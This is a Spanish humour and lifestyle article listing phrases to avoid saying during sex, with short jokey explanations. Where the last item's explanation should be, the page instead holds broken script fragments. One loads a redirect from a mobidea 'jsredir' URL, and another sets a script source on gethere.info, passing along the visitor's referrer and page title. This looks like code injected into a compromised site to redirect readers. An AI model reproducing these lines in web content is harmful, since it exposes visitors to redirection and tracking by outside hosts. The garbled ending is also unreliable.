Frases que nunca debes decir durante el sexo

Por Elizabeth Palacios   @ely__palacios

La comunicación durante el sexo es muy importante, pero así como puede ayudar a elevar la excitación, también puede terminar con el encanto.

Es por esto que en WTF te decimos las frases que nunca debes decir durante el sexo:

-“¿Ya está adentro?”

Por supuesto, nos referimos al pene, preguntar esto significa que ni siquiera sentiste por lo diminuto del asunto, mejor compruébalo por ti misma.

-“¿Terminaste?”

Preguntarle a una mujer si llegó al orgasmo después de que el hombre ya lo hizo, es como una patada en la entrepierna.

-“¿Te gusta?”

Preguntar alguna que otra vez si le gusta alguna de tus mejores técnicas está bien, pero preguntarlo por todo lo que haces, harta, mejor no lo hagas.

-Llamarle por otro nombre

Si andas de pica flor con varias personas, es preferible que utilices un apodo par que no te confundas de nombres.

-“Yo no acostumbro hacer esto”

Si acaban de tener alguna práctica sexual diferente o bastante más atrevida de lo que comúnmente hacen, no te justifiques diciendo que no acostumbras a hacer eso para que no piensen mal de ti, si lo hiciste es porque confías en la otra persona.

-“¿Con cuántas personas te has acostado?”

Si no estás preparado para aceptar el número de personas con quien ha tenido sexo antes que contigo, mejor no andes de detective porque puedes traumarte y reprocharle para siempre.

-Comparar con tus ex

Nunca compares tus experiencias con tus ex parejas y lo que tienes ahora, ten por seguro que a nadie le interesa ser comparado, ¿o a ti te gustaría que te compararan?

-“Ya me vine, ¿Te falta mucho?”

< src="https://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:||